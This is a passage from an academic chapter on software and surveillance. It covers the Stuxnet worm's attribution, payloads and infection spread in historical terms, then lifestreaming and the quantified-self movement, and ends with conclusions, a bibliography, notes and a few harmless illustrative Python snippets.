Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet's source and that they point to the kinds of procedures found in a Western government. He says, 'If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, "We have to prevent collateral damage," and the programmers would go back and add features that normally you don't see in the hacks. And there are several of them in Stuxnet' (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have needed to work on it simultaneously (Zetter, 2010). This is especially true of a worm that launched a so-called 'zero-day attack', that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: 'we're talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).

The two chief capabilities of Stuxnet are: (1) to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, 'attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant' (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and to provide a stealth infection of the computer system that would fool the operators of the plant (the 'man-in-the-middle attack' described above). This was achieved through the use of two 'digital warheads', called 417 and 315. The smaller, 315, was designed slowly to reduce the speed of the rotors, leading to cracks and failures; the larger, 417, manipulated valves in the centrifuges and faked industrial process control sensor signals by modelling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as 'two shooters from different angles'.
The Stuxnet worm was launched some time in 2009/2010, and shortly afterwards:[8]
<blockquote>the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)</blockquote>
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis, performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic: taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers and data structures in order to try to understand what it was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and a link made to Myrtus as 'an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1).
[[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al., n.d.)]]
**Iran - 52.2%
**Indonesia - 17.4%
**India - 11.3%
**Pakistan - 3.6%
**Uzbekistan - 2.6%
**Russia - 2.1%
**Kazakhstan - 1.3%
**Rest of World - 9.4%
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al., n.d.).''
Clearly, this kind of attack could be mobilized against targets other than nuclear-enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and learn, in a very short time, techniques that would otherwise have taken many years of development. As Sean McGurk explains, 'you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from' (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called 'Trojan' (Hopkins, 2011).[10] As Alexander Gostev reports:
<blockquote>There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we're likely to see more modifications in the future. (2012)</blockquote>
The increased ability of software and code, via computational devices, covertly to monitor, control and mediate, both positively and negatively, is not just a matter of interventions designed to deceive the human and non-human actors that make up part of these assemblages. In the next section I want to look at willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams and, more particularly, the quantified-self movement.
== '''Lifestreams''' ==
Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have grown in recent years alongside the 'real-time stream' platforms, such as Twitter and Facebook. Indeed, some argue that 'we're finally in a position where people volunteer information about their specific activities, often their location, who they're with, what they're doing, how they feel about what they're doing, what they're talking about…We've never had data like that before, at least not at that level of granularity' (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the:
<blockquote>idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)</blockquote>
This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams and so on is the next step in social media. It closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example:
<blockquote>The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people's response to alcohol. (Economist, 2012)</blockquote>
Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as:
<blockquote>a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)</blockquote>
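Freeman's description translates almost directly into a data structure. The following is a toy sketch in Python, with invented documents, of the time-ordered stream with its past tail, futural head and a 'filter' operator:

 # A toy rendering of Freeman's lifestream: a time-ordered list of
 # documents (all contents invented for illustration).
 from datetime import datetime, timedelta
 
 now = datetime(2012, 3, 4, 12, 0)
 stream = sorted([
     {"time": now - timedelta(days=400), "kind": "mail", "text": "old letter"},
     {"time": now - timedelta(hours=2), "kind": "paper", "text": "draft in progress"},
     {"time": now + timedelta(days=1), "kind": "reminder", "text": "to-do: review"},
 ], key=lambda d: d["time"])
 
 def substream(docs, kind):
     """Freeman's 'filter' operator: organise documents on demand."""
     return [d for d in docs if d["kind"] == kind]
 
 past = [d for d in stream if d["time"] <= now]    # the diary so far
 future = [d for d in stream if d["time"] > now]   # reminders, to-dos
 print(len(past), len(future), substream(stream, "reminder"))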
Gelernter originally described these 'chronicle streams' (Gelernter, 1994), highlighting both their narrative and temporal dimensions in relation to the storage of documentation and texts. Today we are more likely to think of them as 'real-time streams' and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, with its short, text-message-sized 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks and so forth are factored in. Stephen Wolfram was one of the first people to collect his personal data systematically, starting in 1989: 'So email is one kind of data I've systematically archived. And there's a huge amount that can be learned from that. Another kind of data that I've been collecting is keystrokes. For many years, I've captured every keystroke I've typed—now more than 100 million of them' (Wolfram, 2012).

This kind of self-collection of data is certainly becoming more prevalent, and in the context of reflexivity and self-knowledge it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of the data collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]

Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kind of sophisticated sensory circuitry that is common in smartphones, to log GPS location, direction and so on. This is when lifestreaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users who are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams, n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed:
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)
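A minimal activity in the JSON Activity Streams 1.0 encoding cited above, mirroring the specification's own 'Geraldine posted a photo to her album' example, looks like the following sketch (the URL and names are illustrative):

 # A minimal actor/verb/object/target activity, built and serialised in
 # Python; once encoded as JSON it can be transmitted, aggregated,
 # searched and processed, as described above.
 import json
 
 activity = {
     "published": "2012-03-04T12:00:00Z",
     "actor": {"objectType": "person", "displayName": "Geraldine"},
     "verb": "post",
     "object": {"objectType": "photo",
                "url": "http://example.org/photos/1.jpg"},
     "target": {"objectType": "photo-album",
                "displayName": "Geraldine's album"},
 }
 print(json.dumps(activity, indent=2))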
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps and graph theory that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case - that is, for the individual user (or lifestreamer) and for the organization (such as Facebook) - the key is to pattern-match and compare details of the data, for instance against a norm, a historical data set, or a population, group or class of others.[13]

The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but it also offers a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives for the actor through a stabilising web of meaning.[14]

I now want to turn to how we might draw these case studies together to think about living in code and software, and the implications for wider study in terms of the research and theorisation of computational society.
== '''Conclusions''' ==
It seems that a thread runs through web bugs, viruses and now lifestreaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).

One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: passive in quality - under the surface, relatively benign and silent - but aggressive in their hoarding of data - monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of conciseness in expression. The etymology, from the Latin ''compactus'', closely put together or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).

Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation are often offloaded to the 'cloud', that is, to server computers designed specifically for the task and accessed via networks. Indeed, many viruses often seek to 'call home' to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.

We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor.
Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative orientation towards a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.

There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real - not to mention our failure to appreciate the ways in which code's mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and, whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16]
== '''Acknowledgements''' ==

I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship, ref: 211106, which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at Unlike Us in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: the PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; the ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; the Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium, organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'', organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for his kind permission to use his work, 'The sublime brain [of Jonathon]', which represents a neuronal frontal portrait of an individual, for the cover of the book; for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book.
== '''Bibliography''' ==

60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus "good idea"', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/

60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/

ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/

ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/

Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/

Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html

Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave.

CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBS News'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml

Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook

Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm

Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume 6 Number 1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html

Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer.

Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493

EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/

Evans, S. (2012) 'Duqu Trojan used "unknown" programming language: Kaspersky', ''CBR Software Malware'', accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312

Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html

Eyal, N. (2012) 'How To Manufacture Desire', ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/

Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212

Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf

Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html

Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html

Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/

Gelernter, D. (1994) 'The cyber-road not taken', ''The Washington Post'', April 1994.

Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html

Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073

Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670

Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about

Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat

Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', ''SecureList'', accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers

Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104

Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me

Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press.

Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp. 67-90.

Hopkins, N. (2011) '"New Stuxnet" worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu

Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm

Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&v=CS01Hmjv1pQ

Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/

Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/

Markoff, J. and Sanger, D. E. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1

Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf

Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47.

Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf

Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx

Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures

Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance

Peterson, D. G. (2012) 'Langner's Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/

Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx

Rieland, R. (2012) 'So What Do We Do With All This Data?', ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/

Sanger, D. E. (2012) 'Obama Order Sped Up Wave of Cyberattacks Against Iran', ''The New York Times'', June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1

Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/

Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&pagewanted=all

W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/

Wauters, R. (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', ''The Next Web'', accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/

Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/

Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1

Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/

Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran's Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/
== Notes ==
[1] These include HTTP cookies, Locally Stored Objects (LSOs) and document object model storage (DOM Storage).

[2] 'Cookies are small pieces of text that servers can set and read from a client computer in order to register its "state." They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user's machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server' (Mittal, 2010: 10).
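A sketch of the mechanics Mittal describes, using Python's standard library (the identifier and domain are invented):

 # The server sets a small piece of state; the browser returns it on
 # every subsequent request until the cookie expires or is reset.
 from http import cookies
 
 cookie = cookies.SimpleCookie()
 cookie["uid"] = "abc123"                       # opaque ID, well under 4 KB
 cookie["uid"]["domain"] = "tracker.example"    # hypothetical third party
 cookie["uid"]["max-age"] = 60 * 60 * 24 * 365  # persist for a year
 
 print(cookie.output())
 # roughly: Set-Cookie: uid=abc123; Domain=tracker.example; Max-Age=31536000
 # Each later request carries "Cookie: uid=abc123" back to the server,
 # which is how the same client is re-identified across visits.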
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a).

[4] For an example see http://static.chartbeat.com/js/chartbeat.js

[5] Also see the examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat]; (2) [http://www.google-analytics.com/ga.js Google Analytics]; (3) [http://o.aolcdn.com/omniunih.js Omniture]; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com]

[6] A computer worm is technically similar in design to a virus and is therefore considered to be a subclass of a virus. Worms spread from computer to computer, often across networks, but unlike a virus a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features on a computer, such as the networking setup, which it exploits to travel from computer to computer unaided.

[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code disassembled from the worm and a careful analysis of the internal data structures and the finite state machine used to structure the attack. Ironically, Ralph Langner was then able to match this against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad (see http://www.president.ir/en/9172), confirming the cascade structure, centrifuge layout and enrichment process through careful analysis of background images accidentally photographed on computers used by the president (see Peterson, 2012).

[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may be three versions of the Stuxnet code: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg's view, this may mean that the authors thought Stuxnet wasn't moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011).

[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues that the 'myrtus' string from the recovered Stuxnet file path "b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb" may stand for "My-RTUs", as in Remote Terminal Units.

[10] After having performed a detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012).

[11] See http://quantifiedself.com/

[12] Wolfram further writes: 'It's amazing how much it's possible to figure out by analyzing the various kinds of data I've kept. And in fact, there are many additional kinds of data I haven't even touched on in this post. I've also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier. I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there's a kind of archeology one can do, looking at files that haven't been modified for a long time (the earliest is dated June 29, 1980)' (2012).

[13] Some examples of visualization software for this kind of lifestreaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/

[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012).

